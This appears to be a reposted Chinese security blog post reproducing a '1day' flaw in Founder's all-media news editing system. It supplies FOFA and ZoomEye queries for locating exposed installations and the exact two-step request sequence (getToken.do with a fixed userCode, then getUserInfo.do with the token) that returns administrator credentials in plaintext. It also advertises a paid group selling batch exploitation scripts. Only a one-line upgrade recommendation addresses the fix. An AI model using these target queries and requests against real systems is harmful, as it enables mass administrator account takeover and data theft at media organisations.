首页 > 其他分享 >漏洞复现1day(大量资产存在)方正畅享全媒体采编系统明文账号密码泄露

漏洞复现1day(大量资产存在)方正畅享全媒体采编系统明文账号密码泄露

时间:2024-05-30 16:01:26浏览次数:30  
标签:采编 畅享 媒体 do 帮会 1day token 账号密码 漏洞

  0x01 免责声明

文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。

0x02 漏洞描述

方正电子在传媒行业30多年的技术深耕为基础,与媒体单位的融合进程无缝适配,助力媒体单位逐步破除采编部门自成一体的藩篱,破除传统媒体、新闻网站和新媒体采编发环节的壁垒,创新内部组织结构,建立采编分离、全媒体生产的运行机制

方正全媒体采编系统getUserInfo.do、可获取管理员明文账号和密码。

0x03 测绘查询-系统指纹

 fofa:app="FOUNDER-全媒体采编系统"

zoomeye:title:"全媒体采编"

0x04 漏洞复现

1、访问漏洞系统

2、GET访问URL后面加上漏洞地址获取token

/newsedit/tokenHelp/getToken.do?userCode=a18f178d935d2284a771f6f5903d7160

漏洞URL地址后面加上刚才获取的token

/newsedit/tokenHelp/getUserInfo.do?token=替换为token值

方正全媒体采编系统敏感信息泄露、可获取账号和密码。

 加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc

点击链接加入帮会:加入帮会-发现更有料的网安圈基于安全从业者同行主题交流需求,为入驻者提供WIKI建设、安全经验输出、前沿技术及工具分享等模块,入驻即可共探安全思路。https://wiki.freebuf.com/front/societyFront?invitation_code=2e2d0438&society_id=186&source_data=2

扫描也可加入:

0x05 漏洞修复建议

系统已发布漏洞修复版本,建议升级到最新版本:

http://www.founder.com.cn/

标签:采编,畅享,媒体,do,帮会,1day,token,账号密码,漏洞
From: https://blog.csdn.net/d2407169866/article/details/139296546

相关文章

  • Springboot配置文件中账号密码等敏感信息的加解密
    说明:使用过SpringBoot配置文件的朋友都知道,资源文件中的内容通常情况下是明文显示,安全性比较低。打开application.properties或application.yml,比如MySQL登录密码,Redis登录密码以及第三方的密钥等等一览无余。这里介绍一个加解密组件jasypt,用以提高配置文件中敏感配置数据的......
  • ini配置多组账号密码
    在.ini配置文件中,你可以使用节(section)来组织多组账号密码。下面是一个例子:ini[credentials1]username=user1password=pass1[credentials2]username=user2password=pass2[credentials3]username=user3password=pass3在这个例子中,[credentials1]、[cre......
  • 前端 用账号密码登录的时候 对密码进行加密 【最佳解决方案】用bcrypt.js 或者 crypto
    1、在后台管理的项目中或者其他项目用到账号密码登录的功能,我们需要对密码进行一个密码的操作 2、我们可以使用第三方的库去实现登录密码加密的功能有两个JS库 bcrypt.js或者crypto-js3、方案一使用了bcrypt.js库对密码进行加密。首先,生成一个salt,它是一个随......
  • Git -- 修改git账号密码后,进行git提交时报错
    修改git账号密码后,进行git提交时报错$gitpushorigindevelopremote:HTTPBasic:Accessdeniedfatal:Authenticationfailedfor'http://xxx/web.git/'重新设置下git信息gitconfig--globaluser.name"yourname"gitconfig--globaluser.email"your......
  • linux保存git账号密码
     相信大家都会遇到gitpush提示输入账号密码,每次都要输入很麻烦,下面介绍如何长期保存账号密码1、全局设置记住用户名和电子邮件:gitconfig--globaluser.name"your_username"gitconfig--globaluser.email"[email protected]"2、使用凭证助手存储密码git......
  • HTTP请求中包含账号密码
    如果你需要在HTTP请求中包含账号密码,你可以使用基本的HTTP身份验证。在C#中,你可以通过设置HttpClient的DefaultRequestHeaders来添加身份验证信息。以下是修改后的示例代码:usingSystem;usingSystem.Net.Http;usingSystem.Text;usingSystem.Threading.Tasks;classP......
  • 全志平台增加adb和串口登录的账号密码验证
    直接引用全志论坛的一篇文章,很完整了,当前验证R16平台可行。 链接【https://bbs.aw-ol.com/topic/598/faq-%E5%85%A8%E5%BF%97r329-tina%E4%B8%AD%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8adb-%E4%B8%B2%E5%8F%A3%E5%AF%86%E7%A0%81%E7%99%BB%E5%BD%95?_=1713338833551&lang=zh-CN......
  • <网络安全>《70 微课堂<第11课 0day、1day、nday(精华版)>》
    1什么是0day定义说明早期含义早期的0day表示在软件发行后的24小时内就出现破解版本早期引申含义最短时间内出现相关破解的,都可以叫0day早期通称含义把所有的破解称为0day当前含义当前0day指的是发现软件的漏洞,漏洞特点是:未公开、暂时没有补救措施。0day漏洞掌握未公开或未......
  • 立即解锁免费GPT4 API KEY,畅享顶尖资源!
    作者之前曾经探索过很多可以免费使用GPT-4的方法,但在使用一些AI工具或谷歌插件时,却需要填写GPT的APIKEY。而OpenAI是根据token数计费的。那么,有没有办法可以免费获得GPT的APIKEY呢?确实是有的。在这篇文章中,我将介绍如何通过一个开源工具取得免费的GPTAPIKEY,并探索在实际应用......
  • InfluxDB 常用基本配置,启用账号密码登录,配置指定端口登录
    打开安装目录下的influxdb.conf找到http节点 配置完成后再安装目录下使用命令启动influxdbinfluxd--configinfluxdb.conf启动完成后,基本配置安装部署已结束以下为常见的操作指令:#登录指定ip端口的influxdbinflux-host1.0.0.5-port8086#显示用户SHOWUSERS......